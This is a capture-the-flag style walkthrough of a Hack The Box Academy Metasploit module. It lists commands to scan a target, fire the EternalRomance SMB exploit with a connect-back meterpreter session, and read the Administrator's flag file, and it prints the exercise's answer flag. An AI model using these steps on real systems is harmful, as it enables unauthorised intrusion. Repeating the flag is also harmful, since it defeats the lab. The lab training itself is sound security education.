Modules — Using the Metasploit Framework Module — HTB Walkthrough

TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK

SECTION: Modules

Please open your pwnbox or connect to the vpn in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator’s desktop and submit the contents as the answer.

First of all, scan the given IP address with nmap, to make sure what we are attacking.

nmap -sV <target-ip>

Here we can see, this IP address is running ‘Microsoft Directory Service(microsoft-ds)’ and is using port 445 which is used by Server Message Block (SMB) protocol which is what’s often indicated by the “microsoft-ds” service.

Now, launch metasploit in your terminal.

msfconsole

💡 You can use the -q switch to start without a metasploit banner!

Once started search for “EternalRomance” as told in the question.

search EternalRomance

There are several exploits showing… we will select which best suites our need (we need to run commands on target system).

So, will select the first exploit (index: 0)

use 0

💡 PsExec is a tool developed by Microsoft, part of the Sysinternals suite, that allows you to execute processes on remote systems.

Now you have to setup for the attack, you have to do some configurations.

Tell it (metasploit) what is the IP address you are going to attack! You do not have to tell the port to attack (by defualt it already knows).

set rhost <target-ip>

Now you have to tell what is your IP address (to establish connection between Attacker & Victim).

For this, open a new terminal and type,

ifconfig

Check for the IP which is of the VPN Tunnel, i.e. tun0.

And now set this IP as the local IP.

set lhost <your-vpn-ip>

Now you are all set, but make sure you have everything configured,

show options

Yes, we are all set. Now let’s run the exploit

run

Now you got a meterpreter, for how to operate, type help.

pwd

You will notice you are in C:\Windows\system32.

Navigate to C:\Users\Administrator\Desktop.

cd C:/Users/Administrator/Desktop/

Either type this command or search manually by cd & ls commands.

And finally,

cat flag.txt

Answer: HTB{MSF-W1nD0w5–3xPL01t4t10n}

Still stuck? Watch video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)

The Malware Mender Walkthroughs